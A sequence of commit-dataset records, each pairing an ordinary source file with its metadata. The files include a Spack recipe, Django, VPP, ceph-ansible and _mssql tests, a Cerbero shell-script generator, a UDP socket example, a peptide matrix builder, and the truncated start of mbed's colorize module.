# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyPyani(PythonPackage):
    """pyani is a Python3 module that provides support for calculating
    average nucleotide identity (ANI) and related measures for whole genome
    comparisons, and rendering relevant graphical summary output. Where
    available, it takes advantage of multicore systems, and can integrate
    with SGE/OGE-type job schedulers for the sequence comparisons."""

    homepage = "http://widdowquinn.github.io/pyani"
    url = "https://pypi.io/packages/source/p/pyani/pyani-0.2.7.tar.gz"

    # Checksums are MD5 digests of the PyPI source tarballs.
    version('0.2.7', '239ba630d375a81c35b7c60fb9bec6fa')
    version('0.2.6', 'd5524b9a3c62c36063ed474ea95785c9')

    # pyani is Python3-only (3.5+).
    depends_on('python@3.5:')
    depends_on('py-setuptools', type='build')
    # Graphical summary output.
    depends_on('py-matplotlib', type=('build', 'run'))
    depends_on('py-seaborn', type=('build', 'run'))
    # Required for ANI analysis
    depends_on('py-biopython', type=('build', 'run'))
    depends_on('py-pandas', type=('build', 'run'))
    depends_on('py-scipy', type=('build', 'run'))
    # Required for ANIb analysis
    depends_on('blast-plus~python', type='run')
    # Required for ANIm analysis
    depends_on('mummer', type='run')
|
lgpl-2.1
|
Python
|
|
04ddb34d3dd312294bdc61f694f1db862091cf57
|
Create beta_move_zeroes.py
|
Orange9000/Codewars,Orange9000/Codewars
|
Solutions/beta_move_zeroes.py
|
Solutions/beta_move_zeroes.py
|
def move_zeroes(*args):
    """Return the arguments as a list with every zero moved to the end.

    Non-zero integers come first, in ascending sorted order with
    duplicates preserved, followed by all zeroes from the input.
    Calling with no arguments yields an empty list.
    """
    if not args:
        return []
    nonzero = sorted(value for value in args if value != 0)
    return nonzero + [0] * args.count(0)
|
mit
|
Python
|
|
c45ccd0f258fcbb152ffa9597ceb1bacd472f73b
|
Add test for email backend coverage
|
masschallenge/impact-api,masschallenge/impact-api,masschallenge/impact-api,masschallenge/impact-api
|
web/impact/impact/tests/test_impact_email_backend.py
|
web/impact/impact/tests/test_impact_email_backend.py
|
from mock import patch
from django.core import mail
from django.test import TestCase
from django.urls import reverse
from impact.minimal_email_handler import MinimalEmailHandler
class TestEmailBackend(TestCase):
    """Verify the email backend adds SES logging headers only when a
    SES configuration set is configured in Django settings."""

    # Note: with stacked @patch decorators the bottom-most patch becomes
    # the first mock argument after self.
    @patch("impact.impact_email_backend.ImpactEmailBackend._add_logging_headers")
    @patch("django.core.mail.backends.smtp.EmailBackend.send_messages")
    def test_email_contains_header_if_ses_config_set(
            self,
            mocked_backend,
            mock_add_logging_headers
    ):
        # A non-empty SES_CONFIGURATION_SET must trigger header injection.
        with self.settings(
                SES_CONFIGURATION_SET="test",
                EMAIL_BACKEND='mc.email_backends.AccelerateEmailBackend'):
            MinimalEmailHandler(["a@example.com"],
                                "subject",
                                "body").send()
            self.assertTrue(mock_add_logging_headers.called)

    @patch("impact.impact_email_backend.ImpactEmailBackend._add_logging_headers")
    @patch("django.core.mail.backends.smtp.EmailBackend.send_messages")
    def test_email_does_not_contain_header_if_ses_config_not_set(
            self,
            mocked_backend,
            mock_add_logging_headers
    ):
        # An empty SES_CONFIGURATION_SET must disable header injection.
        with self.settings(
                SES_CONFIGURATION_SET="",
                EMAIL_BACKEND='mc.email_backends.AccelerateEmailBackend'):
            MinimalEmailHandler(["a@example.com"],
                                "subject",
                                "body").send()
            self.assertFalse(mock_add_logging_headers.called)
|
mit
|
Python
|
|
33aa9e79d2fe331f88574c02ad297072455be86a
|
add command to create scripts with the shell env
|
nirbheek/cerbero,flexVDI/cerbero,ikonst/cerbero,justinjoy/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,jackjansen/cerbero-2013,multipath-rtp/cerbero,ikonst/cerbero,sdroege/cerbero,nzjrs/cerbero,superdump/cerbero,nzjrs/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,davibe/cerbero,superdump/cerbero,ramaxlo/cerbero,jackjansen/cerbero,flexVDI/cerbero,ikonst/cerbero,EricssonResearch/cerbero,BigBrother-International/gst-cerbero,AlertMe/cerbero,shoreflyer/cerbero,AlertMe/cerbero,BigBrother-International/gst-cerbero,brion/cerbero,nirbheek/cerbero,ramaxlo/cerbero,sdroege/cerbero,AlertMe/cerbero,ford-prefect/cerbero,sdroege/cerbero,multipath-rtp/cerbero,brion/cerbero,jackjansen/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,ford-prefect/cerbero,EricssonResearch/cerbero,justinjoy/cerbero,davibe/cerbero,shoreflyer/cerbero,atsushieno/cerbero,ramaxlo/cerbero,brion/cerbero,fluendo/cerbero,lubosz/cerbero,centricular/cerbero,jackjansen/cerbero-2013,BigBrother-International/gst-cerbero,lubosz/cerbero,cee1/cerbero-mac,freedesktop-unofficial-mirror/gstreamer__cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,ylatuya/cerbero,OptoFidelity/cerbero,cee1/cerbero-mac,centricular/cerbero,jackjansen/cerbero-2013,GStreamer/cerbero,ylatuya/cerbero,shoreflyer/cerbero,nzjrs/cerbero,nirbheek/cerbero-old,ylatuya/cerbero,atsushieno/cerbero,ramaxlo/cerbero,shoreflyer/cerbero,justinjoy/cerbero,shoreflyer/cerbero,cee1/cerbero-mac,nicolewu/cerbero,multipath-rtp/cerbero,nirbheek/cerbero-old,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,nirbheek/cerbero-old,davibe/cerbero,centricular/cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,jackjansen/cerbero,AlertMe/cerbero,cee1/cerbero-mac,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,GStreamer/cerbero,OptoFidelity/cerbero,ylatuya/cerbero,fluendo/cerbero,AlertMe/cerbero,nirbheek/cerbero,nzjrs/cerbero,sdroege/cerbero,ikonst/cerbero,OptoFidelity/cerbero,GStreamer/cerbero,freedesktop-unoffici
al-mirror/gstreamer-sdk__cerbero,flexVDI/cerbero,fluendo/cerbero,davibe/cerbero,nirbheek/cerbero,OptoFidelity/cerbero,brion/cerbero,lubosz/cerbero,freedesktop-unofficial-mirror/gstreamer-sdk__cerbero,fluendo/cerbero,EricssonResearch/cerbero,flexVDI/cerbero,EricssonResearch/cerbero,brion/cerbero,ramaxlo/cerbero,atsushieno/cerbero,multipath-rtp/cerbero,atsushieno/cerbero,multipath-rtp/cerbero,BigBrother-International/gst-cerbero,ford-prefect/cerbero,GStreamer/cerbero,fluendo/cerbero,EricssonResearch/cerbero,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,atsushieno/cerbero,ikonst/cerbero,nzjrs/cerbero,nirbheek/cerbero-old,freedesktop-unofficial-mirror/gstreamer__sdk__cerbero,sdroege/cerbero,centricular/cerbero,jackjansen/cerbero,BigBrother-International/gst-cerbero,nicolewu/cerbero,ford-prefect/cerbero,superdump/cerbero,jackjansen/cerbero-2013,GStreamer/cerbero,nicolewu/cerbero,jackjansen/cerbero-2013,lubosz/cerbero,freedesktop-unofficial-mirror/gstreamer__cerbero,centricular/cerbero,justinjoy/cerbero,superdump/cerbero,flexVDI/cerbero
|
cerbero/commands/gensdkshell.py
|
cerbero/commands/gensdkshell.py
|
# cerbero - a multi-platform build system for Open Source software
# Copyright (C) 2012 Andoni Morales Alastruey <ylatuya@gmail.com>
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Library General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Library General Public License for more details.
#
# You should have received a copy of the GNU Library General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
from cerbero.commands import Command, register_command
from cerbero.errors import FatalError
from cerbero.utils import _, N_, ArgparseArgument, shell
# Template for the generated script: the first %s receives the
# VAR="value" environment lines, the second the command to execute.
SCRIPT_TPL = '''\
#!/bin/bash
%s
%s
'''
class GenSdkShell(Command):
    """Cerbero command that writes an executable script exporting the
    SDK environment and then running a command (Python 2 code)."""

    doc = N_('Create a script with the shell environment for the SDK')
    name = 'gensdkshell'

    # Default payload: exec whatever command line the caller appends.
    DEFAULT_CMD = 'exec "$@"'

    def __init__(self):
        # NOTE(review): 'scrips' in the help text below looks like a typo
        # for 'scripts' -- left untouched here (runtime string).
        Command.__init__(self,
            [ArgparseArgument('name', nargs=1, default='sdk-shell',
                help=_('name of the scrips')),
             ArgparseArgument('-o', '--output-dir', default='.',
                help=_('output directory')),
             ArgparseArgument('-p', '--prefix',
                help=_('prefix of the SDK')),
             ArgparseArgument('--cmd', default=self.DEFAULT_CMD,
                help=_('command to run in the script')),
            ])

    def run(self, config, args):
        # Unpack CLI arguments, defaulting the prefix to the active config's.
        name = args.name[0]
        prefix = args.prefix and args.prefix or config.prefix
        libdir = os.path.join(prefix, 'lib')
        py_prefix = config.py_prefix
        output_dir = args.output_dir
        cmd = args.cmd
        self.runargs(config, name, output_dir, prefix, libdir, py_prefix, cmd)

    def runargs(self, config, name, output_dir, prefix, libdir,
                py_prefix, cmd=None):
        """Write output_dir/name with the SDK env exported, then chmod +x it."""
        cmd = cmd or self.DEFAULT_CMD
        env = config.get_env(prefix, libdir, py_prefix)
        env['PATH'] = '%s/bin:$PATH' % prefix
        env['LDFLAGS'] = '-L%s' % libdir
        envstr = ''
        # Re-point any baked-in config prefix at the requested prefix.
        for e, v in env.iteritems():
            v = v.replace(config.prefix, prefix)
            envstr += '%s="%s"\n' % (e, v)
        try:
            filepath = os.path.join(output_dir, name)
            with open(filepath, 'w+') as f:
                f.write(SCRIPT_TPL % (envstr, cmd))
            shell.call("chmod +x %s" % filepath)
        except IOError, ex:
            raise FatalError(_("Error creating script: %s", ex))


register_command(GenSdkShell)
|
lgpl-2.1
|
Python
|
|
a8c3bbc363a319cd2e5748b1265b6e00563d510a
|
add udp.py
|
tjctw/PythonNote,tjctw/PythonNote,tjctw/PythonNote,tjctw/PythonNote
|
Foundations.of.Python.Network.Programming.369p/udp.py
|
Foundations.of.Python.Network.Programming.369p/udp.py
|
import argparse, socket
from datetime import datetime
# Largest UDP datagram payload we are willing to receive in one call.
MAX_BYTES = 65535
def server(port):
    """Run a UDP server on localhost:*port* forever, replying to each
    datagram with a message stating its length."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    listener.bind(('127.0.0.1', port))
    print('Listening at {}'.format(listener.getsockname()))
    while True:
        payload, peer = listener.recvfrom(MAX_BYTES)
        message = payload.decode('ascii')
        print('The client at {} says {!r}'.format(peer, message))
        reply = 'Your data was {} bytes long'.format(len(payload))
        listener.sendto(reply.encode('ascii'), peer)
def client(port):
    """Send one timestamped datagram to localhost:*port* and print the reply."""
    conn = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    greeting = 'The time is {}'.format(datetime.now())
    conn.sendto(greeting.encode('ascii'), ('127.0.0.1', port))
    print('The OS assigned me the address {}'.format(conn.getsockname()))
    # Danger!  recvfrom() accepts a datagram from *any* sender, not
    # necessarily the server we just messaged.
    payload, sender = conn.recvfrom(MAX_BYTES)
    print('The server {} replied {!r}'.format(sender, payload.decode('ascii')))
if __name__ == '__main__':
    # Map the positional 'role' argument onto the function implementing it.
    choices = {'client': client, 'server': server}
    parser = argparse.ArgumentParser(description='Send and receive UDP locally')
    parser.add_argument('role', choices=choices, help='which role to play')
    parser.add_argument('-p', metavar='PORT', type=int, default=1060,
                        help='UDP port (default 1060)')
    args = parser.parse_args()
    # Dispatch to server() or client() with the chosen port.
    function = choices[args.role]
    function(args.p)
|
cc0-1.0
|
Python
|
|
b1c0b9afacb12e8255681db25a01b94f25fed89e
|
add http tps test
|
chrisy/vpp,chrisy/vpp,chrisy/vpp,FDio/vpp,chrisy/vpp,FDio/vpp,FDio/vpp,chrisy/vpp,FDio/vpp,FDio/vpp,FDio/vpp,chrisy/vpp,chrisy/vpp,chrisy/vpp,FDio/vpp,FDio/vpp
|
test/test_http.py
|
test/test_http.py
|
#!/usr/bin/env python3
""" Vpp HTTP tests """
import unittest
import os
import subprocess
import http.client
from framework import VppTestCase, VppTestRunner, Worker
from vpp_devices import VppTAPInterface
@unittest.skip("Requires root")
class TestHttpTps(VppTestCase):
    """ HTTP test class """

    @classmethod
    def setUpClass(cls):
        super(TestHttpTps, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        super(TestHttpTps, cls).tearDownClass()

    def setUp(self):
        # Wire a host tap interface into VPP and enable the session layer
        # so the built-in http server can listen.
        self.client_ip4 = '172.0.0.2'
        self.server_ip4 = '172.0.0.1'
        self.vapi.cli(f'create tap id 0 host-ip4-addr {self.client_ip4}/24')
        self.vapi.cli(f'set int ip addr tap0 {self.server_ip4}/24')
        self.vapi.cli('set int state tap0 up')
        self.vapi.session_enable_disable(is_enable=1)

    def test_http_tps(self):
        # Fetch a 1 MiB file from VPP's http tps server and verify the
        # whole body arrives.
        fname = 'test_file_1M'
        self.vapi.cli('http tps uri tcp://0.0.0.0/8080')
        con = http.client.HTTPConnection(f"{self.server_ip4}", 8080)
        con.request('GET', f'/{fname}')
        r = con.getresponse()
        self.assertEqual(len(r.read()), 1 << 20)
# Allow running this module directly under VPP's test runner.
if __name__ == '__main__':
    unittest.main(testRunner=VppTestRunner)
|
apache-2.0
|
Python
|
|
51b90afe8388b0425810bc1560cffe2e5a02fca8
|
Add boolean matrix generator - from mocogenomics
|
andretadeu/jhu-immuno,andretadeu/jhu-immuno
|
code/generate_boolean_matrix.py
|
code/generate_boolean_matrix.py
|
import itertools
# The 20 standard amino-acid one-letter codes (appears unused in this
# module -- generateBooleanMatrix defines its own copy).
letters = ['A','R','N','D','C','E','Q','G','H','I','L','K','M','F','P','S','T','W','Y','V']
# generates a matrix from all peptides and saves to CSV
def generateBooleanMatrix(peptides):
    """Build a one-hot (boolean) position/amino-acid matrix for *peptides*.

    The first returned row is a header: 'peptide' followed by
    ``peptide_length * 20`` column names of the form ``Pos1A`` .. ``Pos9V``.
    Each subsequent row starts with the peptide string, followed by a 0/1
    flag for every (position, amino acid) pair.  Peptides shorter than
    ``peptide_length`` are zero-padded on the right so every row matches
    the header width.
    """
    # generate header ------
    peptide_length = 9
    aa_list = ['A', 'R', 'N', 'D', 'C', 'E', 'Q', 'G', 'H', 'I',
               'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']
    positions = ['Pos%d' % i for i in range(1, peptide_length + 1)]
    header = ['peptide']
    for pos, aa in itertools.product(positions, ''.join(aa_list)):
        header.append(pos + aa)

    # initialize master matrix and add header as a row
    matrix = [header]

    # generate one boolean row per peptide and append -----
    for peptide in peptides:
        print('Peptide:')  # for testing
        print(peptide)     # for testing
        amino_acids = list(peptide)
        row = [peptide]
        # one 20-wide one-hot sub-array per occupied position
        for residue in amino_acids:
            for candidate in aa_list:
                row.append(1 if residue == candidate else 0)
        # BUG FIX: the original padding referenced an undefined
        # ``max_length`` and ran inside the per-position loop; instead,
        # pad the completed row out to the full header width.
        row.extend([0] * ((peptide_length - len(amino_acids)) * len(aa_list)))
        # add peptide row to master matrix
        matrix.append(row)
    return matrix
# save to CSV -------
|
mit
|
Python
|
|
05dace442d2d6123703910ea80aec6e989c65009
|
create the conftest file that does all the magic
|
jtaleric/ceph-ansible,bengland2/ceph-ansible,jtaleric/ceph-ansible,guits/ceph-ansible,WingkaiHo/ceph-ansible,jsaintrocc/ceph-ansible,ceph/ceph-ansible,WingkaiHo/ceph-ansible,bengland2/ceph-ansible,jsaintrocc/ceph-ansible,albertomurillo/ceph-ansible,travmi/ceph-ansible,font/ceph-ansible,albertomurillo/ceph-ansible,albertomurillo/ceph-ansible,guits/ceph-ansible,WingkaiHo/ceph-ansible,fgal/ceph-ansible,fgal/ceph-ansible,ceph/ceph-ansible,travmi/ceph-ansible,font/ceph-ansible
|
tests/conftest.py
|
tests/conftest.py
|
import os
import pytest
import imp
def pytest_addoption(parser):
    """Register the ``--scenario`` command line option with pytest."""
    default_scenario = 'scenario.py'
    help_text = (
        "YAML file defining scenarios to test. "
        "Currently defaults to: %s" % default_scenario
    )
    parser.addoption("--scenario", action="store",
                     default=default_scenario, help=help_text)
def load_scenario_config(filepath, **kw):
    '''
    Creates a configuration dictionary from a file.

    :param filepath: The path to the file.
    '''
    # NOTE(review): **kw is accepted but never used in this body; callers
    # pass args=... -- confirm intent before removing.
    abspath = os.path.abspath(os.path.expanduser(filepath))
    conf_dict = {}
    if not os.path.isfile(abspath):
        raise RuntimeError('`%s` is not a file.' % abspath)

    # First, make sure the code will actually compile (and has no SyntaxErrors)
    with open(abspath, 'rb') as f:
        compiled = compile(f.read(), abspath, 'exec')

    # Next, attempt to actually import the file as a module.
    # This provides more verbose import-related error reporting than exec()
    absname, _ = os.path.splitext(abspath)
    basepath, module_name = absname.rsplit(os.sep, 1)
    # NOTE(review): the ``imp`` module is deprecated and removed in
    # Python 3.12; importlib is the modern equivalent.
    imp.load_module(
        module_name,
        *imp.find_module(module_name, [basepath])
    )

    # If we were able to import as a module, actually exec the compiled code
    # into conf_dict so the file's top-level names become config keys.
    exec(compiled, globals(), conf_dict)
    conf_dict['__file__'] = abspath
    return conf_dict
def pytest_configure_node(node):
    """xdist hook: push this slave's slice of the scenario configuration
    down to the node before its tests run."""
    node_id = node.slaveinput['slaveid']
    scenario_path = os.path.abspath(node.config.getoption('--scenario'))
    scenario = load_scenario_config(scenario_path)
    # Each slave only receives the config stanza for its own node name,
    # plus the full scenario for fixtures that need it.
    node.slaveinput['node_config'] = scenario['nodes'][node_id]
    node.slaveinput['scenario_config'] = scenario
@pytest.fixture(scope='session')
def node_config(request):
    # Per-node config stanza injected by pytest_configure_node() on the master.
    return request.config.slaveinput['node_config']
@pytest.fixture(scope="session")
def scenario_config(request):
return request.config.slaveinput['scenario_config']
def pytest_report_header(config):
    """
    Hook to add extra information about the execution environment and to be
    able to debug what the magical args got expanded to.
    """
    scenario_path = str(config.rootdir.join(config.getoption('--scenario')))
    environment = 'remote' if config.remote_execution else 'local'
    return [
        'execution environment: %s' % environment,
        'loaded scenario: %s' % scenario_path,
        'expanded args: %s' % config.extended_args,
    ]
def pytest_cmdline_preparse(args, config):
    """Expand the command line in place so tests fan out to every node
    declared in the scenario file."""
    # Note: we can only do our magical args expansion if we aren't already in
    # a remote node via xdist/execnet so return quickly if we can't do magic.
    # TODO: allow setting an environment variable that helps to skip this kind
    # of magical argument expansion
    if os.getcwd().endswith('pyexecnetcache'):
        return
    scenario_path = os.path.abspath(config.getoption('--scenario'))
    scenarios = load_scenario_config(scenario_path, args=args)
    # Everything under functional/ is rsynced to the remote nodes.
    rsync_dir = os.path.dirname(str(config.rootdir.join('functional')))
    test_path = str(config.rootdir.join('functional/tests'))
    nodes = []
    config.remote_execution = True

    # One '--tx vagrant_ssh=<node>//id=<node>' pair per scenario node.
    for node in scenarios.get('nodes', []):
        nodes.append('--tx')
        nodes.append('vagrant_ssh={node_name}//id={node_name}'.format(node_name=node))

    # Mutate argv in place: distribute to every node, never restart dead
    # slaves, and rsync the functional tree across.
    args[:] = args + ['--max-slave-restart', '0', '--dist=each'] + nodes + ['--rsyncdir', rsync_dir, test_path]
    config.extended_args = ' '.join(args)
|
apache-2.0
|
Python
|
|
7de5d0df0b726c629724d931766ede629a451d18
|
Add logging tests.
|
AdamGagorik/pydarkstar,LegionXI/pydarkstar
|
tests/logutils.py
|
tests/logutils.py
|
"""
.. moduleauthor:: Adam Gagorik <adam.gagorik@gmail.com>
"""
import unittest
import pydarkstar.logutils
pydarkstar.logutils.setDebug()
class TestLogutils(unittest.TestCase):
    # Placeholder suite: importing pydarkstar.logutils (and the module-level
    # setDebug() call above) acts as the smoke test for now.
    pass
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
mit
|
Python
|
|
7a7c8c1f735982ca8403aec05861430ba70aca7f
|
add a test that checks _mssql whilst being run in threads
|
JimDennis/pymssql,zerolugithub/pymssql,djhenderson/pymssql,Alwnikrotikz/pymssql,Aloomaio/pymssql,JimDennis/pymssql,MunDaesik/pymssql,pymssql/pymssql,thegooglecodearchive/pymssql,msabramo/pymssql,msabramo/pymssql,klothe/pymssql,Aloomaio/pymssql,Aloomaio/pymssql,google-code-export/pymssql,bladams/pymssql,google-code-export/pymssql,bladams/pymssql,ramiro/pymssql,klothe/pymssql,djhenderson/pymssql,AlanZatarain/pymssql,google-code-export/pymssql,MunDaesik/pymssql,zerolugithub/pymssql,bladams/pymssql,MunDaesik/pymssql,thegooglecodearchive/pymssql,AlanZatarain/pymssql,Alwnikrotikz/pymssql,thegooglecodearchive/pymssql,AlanZatarain/pymssql,pymssql/pymssql,ramiro/pymssql,ramiro/pymssql,JimDennis/pymssql,djhenderson/pymssql,Alwnikrotikz/pymssql,zerolugithub/pymssql,msabramo/pymssql,klothe/pymssql
|
tests/threaded.py
|
tests/threaded.py
|
import _mssql
import unittest
import threading
from mssqltests import server, username, password, database
class TestingThread(threading.Thread):
    """Worker that opens its own _mssql connection and runs 100 queries.

    Each thread checks that ``SELECT %d`` round-trips the loop index, then
    closes its connection.  ``self.running`` flags whether the workload is
    still in progress (Python 2 code: xrange).
    """

    def run(self):
        self.running = True
        mssql = _mssql.connect(server, username, password)
        mssql.select_db(database)
        for i in xrange(0, 100):
            mssql.execute_query('SELECT %d', (i,))
            for row in mssql:
                assert row[0] == i
        mssql.close()
        # BUG FIX: the original set ``running = True`` again here; the
        # flag must drop to False once the workload has finished.  (The
        # driver below polls is_alive() instead, so this was latent.)
        self.running = False
class ThreadedTests(unittest.TestCase):
    """Drive several TestingThread workers concurrently to shake out
    thread-safety problems in _mssql."""

    def testThreadedUse(self):
        # Start five concurrent query threads (Python 2 code: xrange).
        threads = []
        for i in xrange(0, 5):
            thread = TestingThread()
            thread.start()
            threads.append(thread)

        # Busy-wait until every worker thread has exited.
        running = True
        while running:
            running = False
            for thread in threads:
                if thread.is_alive():
                    running = True
                    break
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
lgpl-2.1
|
Python
|
|
5fbcc25b46a5886307a1dba3d2771c3dd39b0570
|
Format and document colorize
|
fahhem/mbed-os,Archcady/mbed-os,geky/mbed,fanghuaqi/mbed,kl-cruz/mbed-os,c1728p9/mbed-os,jeremybrodt/mbed,fahhem/mbed-os,mazimkhan/mbed-os,bulislaw/mbed-os,j-greffe/mbed-os,arostm/mbed-os,theotherjimmy/mbed,theotherjimmy/mbed,radhika-raghavendran/mbed-os5.1-onsemi,infinnovation/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,CalSol/mbed,ryankurte/mbed-os,fvincenzo/mbed-os,fahhem/mbed-os,adustm/mbed,andcor02/mbed-os,betzw/mbed-os,adustm/mbed,fanghuaqi/mbed,cvtsi2sd/mbed-os,mazimkhan/mbed-os,CalSol/mbed,pradeep-gr/mbed-os5-onsemi,fvincenzo/mbed-os,betzw/mbed-os,bcostm/mbed-os,ryankurte/mbed-os,netzimme/mbed-os,mmorenobarm/mbed-os,nRFMesh/mbed-os,ryankurte/mbed-os,kjbracey-arm/mbed,arostm/mbed-os,netzimme/mbed-os,fvincenzo/mbed-os,mazimkhan/mbed-os,monkiineko/mbed-os,catiedev/mbed-os,j-greffe/mbed-os,andreaslarssonublox/mbed,ryankurte/mbed-os,bulislaw/mbed-os,CalSol/mbed,Archcady/mbed-os,mmorenobarm/mbed-os,mmorenobarm/mbed-os,infinnovation/mbed-os,netzimme/mbed-os,theotherjimmy/mbed,andreaslarssonublox/mbed,j-greffe/mbed-os,andcor02/mbed-os,cvtsi2sd/mbed-os,andreaslarssonublox/mbed,screamerbg/mbed,mbedmicro/mbed,YarivCol/mbed-os,mikaleppanen/mbed-os,monkiineko/mbed-os,jeremybrodt/mbed,mazimkhan/mbed-os,adustm/mbed,RonEld/mbed,svastm/mbed,betzw/mbed-os,fahhem/mbed-os,geky/mbed,NXPmicro/mbed,adustm/mbed,NXPmicro/mbed,adustm/mbed,HeadsUpDisplayInc/mbed,tung7970/mbed-os-1,bcostm/mbed-os,ryankurte/mbed-os,HeadsUpDisplayInc/mbed,mbedmicro/mbed,maximmbed/mbed,mbedmicro/mbed,fahhem/mbed-os,mikaleppanen/mbed-os,fanghuaqi/mbed,nRFMesh/mbed-os,pradeep-gr/mbed-os5-onsemi,arostm/mbed-os,netzimme/mbed-os,kl-cruz/mbed-os,mbedmicro/mbed,radhika-raghavendran/mbed-os5.1-onsemi,mikaleppanen/mbed-os,betzw/mbed-os,YarivCol/mbed-os,maximmbed/mbed,HeadsUpDisplayInc/mbed,adamgreen/mbed,betzw/mbed-os,bulislaw/mbed-os,screamerbg/mbed,maximmbed/mbed,andcor02/mbed-os,mbedmicro/mbed,bcostm/mbed-os,nRFMesh/mbed-os,mikaleppanen/mbed-os,cvtsi2sd/mbed-os,tung7970/mbed-os,screamerbg/mbed,HeadsUpDisplay
Inc/mbed,arostm/mbed-os,maximmbed/mbed,svogl/mbed-os,c1728p9/mbed-os,HeadsUpDisplayInc/mbed,pradeep-gr/mbed-os5-onsemi,mmorenobarm/mbed-os,monkiineko/mbed-os,YarivCol/mbed-os,monkiineko/mbed-os,c1728p9/mbed-os,RonEld/mbed,fahhem/mbed-os,jeremybrodt/mbed,radhika-raghavendran/mbed-os5.1-onsemi,RonEld/mbed,YarivCol/mbed-os,kjbracey-arm/mbed,mazimkhan/mbed-os,tung7970/mbed-os,geky/mbed,screamerbg/mbed,mikaleppanen/mbed-os,andcor02/mbed-os,fanghuaqi/mbed,karsev/mbed-os,ryankurte/mbed-os,screamerbg/mbed,arostm/mbed-os,nvlsianpu/mbed,catiedev/mbed-os,j-greffe/mbed-os,j-greffe/mbed-os,jeremybrodt/mbed,bulislaw/mbed-os,infinnovation/mbed-os,fvincenzo/mbed-os,fvincenzo/mbed-os,kl-cruz/mbed-os,Archcady/mbed-os,svogl/mbed-os,bcostm/mbed-os,netzimme/mbed-os,tung7970/mbed-os-1,tung7970/mbed-os-1,c1728p9/mbed-os,infinnovation/mbed-os,bcostm/mbed-os,catiedev/mbed-os,karsev/mbed-os,nRFMesh/mbed-os,jeremybrodt/mbed,nRFMesh/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,RonEld/mbed,tung7970/mbed-os-1,theotherjimmy/mbed,svogl/mbed-os,nvlsianpu/mbed,NXPmicro/mbed,pradeep-gr/mbed-os5-onsemi,geky/mbed,netzimme/mbed-os,maximmbed/mbed,pradeep-gr/mbed-os5-onsemi,svastm/mbed,geky/mbed,cvtsi2sd/mbed-os,mmorenobarm/mbed-os,monkiineko/mbed-os,pradeep-gr/mbed-os5-onsemi,Archcady/mbed-os,adustm/mbed,adamgreen/mbed,adamgreen/mbed,YarivCol/mbed-os,svogl/mbed-os,NXPmicro/mbed,mikaleppanen/mbed-os,nRFMesh/mbed-os,RonEld/mbed,Archcady/mbed-os,karsev/mbed-os,NXPmicro/mbed,kl-cruz/mbed-os,nvlsianpu/mbed,kl-cruz/mbed-os,karsev/mbed-os,catiedev/mbed-os,cvtsi2sd/mbed-os,svogl/mbed-os,kjbracey-arm/mbed,nvlsianpu/mbed,mazimkhan/mbed-os,fanghuaqi/mbed,infinnovation/mbed-os,CalSol/mbed,svastm/mbed,RonEld/mbed,c1728p9/mbed-os,adamgreen/mbed,bulislaw/mbed-os,bcostm/mbed-os,YarivCol/mbed-os,andreaslarssonublox/mbed,tung7970/mbed-os,theotherjimmy/mbed,catiedev/mbed-os,mmorenobarm/mbed-os,betzw/mbed-os,karsev/mbed-os,CalSol/mbed,arostm/mbed-os,catiedev/mbed-os,maximmbed/mbed,andreaslarssonublox/mbed,svogl/mbed-os,nv
lsianpu/mbed,svastm/mbed,nvlsianpu/mbed,NXPmicro/mbed,andcor02/mbed-os,radhika-raghavendran/mbed-os5.1-onsemi,kl-cruz/mbed-os,adamgreen/mbed,j-greffe/mbed-os,tung7970/mbed-os-1,HeadsUpDisplayInc/mbed,infinnovation/mbed-os,kjbracey-arm/mbed,screamerbg/mbed,bulislaw/mbed-os,c1728p9/mbed-os,CalSol/mbed,svastm/mbed,theotherjimmy/mbed,cvtsi2sd/mbed-os,tung7970/mbed-os,tung7970/mbed-os,andcor02/mbed-os,Archcady/mbed-os,karsev/mbed-os,adamgreen/mbed,monkiineko/mbed-os
|
tools/colorize.py
|
tools/colorize.py
|
# mbed SDK
# Copyright (c) 2016 ARM Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" This python file is responsible for generating colorized notifiers.
"""
import sys
import re
from colorama import init, Fore, Back, Style
# Hook colorama's Win32 translation into stdout/stderr.
init()

# Map human-readable color names (plus 'on_*' background variants) to the
# escape sequences colorama provides.
COLORS = {
    'none' : "",
    'default' : Style.RESET_ALL,

    'black'   : Fore.BLACK,
    'red'     : Fore.RED,
    'green'   : Fore.GREEN,
